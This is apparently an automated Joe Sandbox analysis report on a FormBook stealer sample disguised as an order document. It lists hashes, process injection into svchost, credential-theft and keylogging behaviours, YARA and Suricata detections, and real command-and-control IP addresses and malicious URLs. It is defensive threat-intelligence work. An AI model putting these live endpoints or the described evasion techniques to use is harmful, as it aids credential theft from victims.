Edit tour

Windows Analysis Report
MV Sunshine, ORDER.exe

Overview

General Information

Sample name:	MV Sunshine, ORDER.exe
Analysis ID:	1491394
MD5:	fbc68c0b27f383eeb5177a01d2464b74
SHA1:	33ce6d297f5039c828f21d17c1ac6acde4b0153c
SHA256:	8dddd8491db05ec4904bb6b6fd63ac5412b23fd89cefbf1b3c5ca74325615e8e
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

MV Sunshine, ORDER.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe" MD5: FBC68C0B27F383EEB5177A01D2464B74)

svchost.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

QAjjirwAoAEExvw.exe (PID: 2700 cmdline: "C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

clip.exe (PID: 7544 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)

QAjjirwAoAEExvw.exe (PID: 2008 cmdline: "C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7868 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x267e30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x25139f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x267e30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x25139f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine, ORDER.exe, ParentProcessId: 7416, ParentProcessName: MV Sunshine, ORDER.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ProcessId: 7432, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ParentImage: C:\Users\user\Desktop\MV Sunshine, ORDER.exe, ParentProcessId: 7416, ParentProcessName: MV Sunshine, ORDER.exe, ProcessCommandLine: "C:\Users\user\Desktop\MV Sunshine, ORDER.exe", ProcessId: 7432, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-12T05:15:56.156882+0200
SID:	2855464
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-12T05:14:25.278013+0200
SID:	2050745
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-12T05:14:43.637779+0200
SID:	2855464
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-12T05:15:49.902471+0200
SID:	2050745
Severity:	1
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.58.112.174

Timestamp:	2024-08-12T05:16:23.205204+0200
SID:	2855464
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-12T05:15:14.267045+0200
SID:	2855464
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-12T05:13:46.967798+0200
SID:	2855464
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-12T05:15:42.288965+0200
SID:	2855464
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 104.21.45.56

Timestamp:	2024-08-12T05:12:53.078148+0200
SID:	2050745
Severity:	1
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-12T05:15:11.733973+0200
SID:	2855464
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-12T05:16:17.398800+0200
SID:	2050745
Severity:	1
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-12T05:16:14.936864+0200
SID:	2855464
Severity:	1
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-12T05:13:52.142938+0200
SID:	2855464
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.21.45.56

Timestamp:	2024-08-12T05:16:39.937120+0200
SID:	2855464
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-12T05:14:54.456190+0200
SID:	2855464
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.58.112.174

Timestamp:	2024-08-12T05:16:25.748333+0200
SID:	2855464
Severity:	1
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-12T05:15:47.365213+0200
SID:	2855464
Severity:	1
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-12T05:14:48.710219+0200
SID:	2050745
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.21.45.56

Timestamp:	2024-08-12T05:16:42.469573+0200
SID:	2855464
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-12T05:16:04.076895+0200
SID:	2050745
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-12T05:14:16.660530+0200
SID:	2855464
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-12T05:15:02.090377+0200
SID:	2050745
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-12T05:14:21.740501+0200
SID:	2855464
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 208.91.197.27

Timestamp:	2024-08-12T05:14:19.207640+0200
SID:	2855464
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-12T05:15:58.646857+0200
SID:	2855464
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-12T05:15:36.645488+0200
SID:	2050745
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-12T05:14:46.413561+0200
SID:	2855464
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.58.112.174

Timestamp:	2024-08-12T05:16:28.296861+0200
SID:	2855464
Severity:	1
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-12T05:14:56.999620+0200
SID:	2855464
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-12T05:16:12.321101+0200
SID:	2855464
Severity:	1
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 43.252.167.188

Timestamp:	2024-08-12T05:14:41.119684+0200
SID:	2855464
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-12T05:13:54.608641+0200
SID:	2050745
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 194.58.112.174

Timestamp:	2024-08-12T05:16:30.835820+0200
SID:	2050745
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.21.45.56

Timestamp:	2024-08-12T05:16:37.390178+0200
SID:	2855464
Severity:	1
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 23.251.54.212

Timestamp:	2024-08-12T05:15:09.208803+0200
SID:	2855464
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE FormBook CnC Checkin (GET) M5 - Source IP: 192.168.2.4 - Destination IP: 5.44.111.162

Timestamp:	2024-08-12T05:13:30.987934+0200
SID:	2050745
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.19

Timestamp:	2024-08-12T05:16:09.779223+0200
SID:	2855464
Severity:	1
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 194.9.94.85

Timestamp:	2024-08-12T05:14:59.550719+0200
SID:	2855464
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.106

Timestamp:	2024-08-12T05:13:49.494279+0200
SID:	2855464
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 213.145.228.16

Timestamp:	2024-08-12T05:16:01.197323+0200
SID:	2855464
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.192.19.19

Timestamp:	2024-08-12T05:15:44.839054+0200
SID:	2855464
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/	Avira URL Cloud: Label: malware
Source: http://www.xn--matfrmn-jxa4m.se/4hda/	Avira URL Cloud: Label: malware
Source: http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: www.sandranoll.com	Virustotal: Detection: 10%			Perma Link
Source: www.anuts.top	Virustotal: Detection: 7%			Perma Link

Multi AV Scanner detection for submitted file

Source: MV Sunshine, ORDER.exe	ReversingLabs: Detection: 36%
Source: MV Sunshine, ORDER.exe	Virustotal: Detection: 30%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: MV Sunshine, ORDER.exe

Joe Sandbox ML: detected

Source: MV Sunshine, ORDER.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QAjjirwAoAEExvw.exe, 00000002.00000000.1797929729.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4132539420.0000000000CEE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MV Sunshine, ORDER.exe, 00000000.00000003.1681365995.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, MV Sunshine, ORDER.exe, 00000000.00000003.1681714096.0000000004080000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1776961435.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775137879.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1873846280.0000000003900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.4134324267.000000000496E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1873512801.0000000004468000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1875354185.000000000461D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134324267.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4132740210.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4134771184.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4134268759.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2164103404.000000001685C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1873461084.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1841254218.000000000321A000.00000004.00000020.00020000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000002.4133106633.0000000000E58000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_009E4696
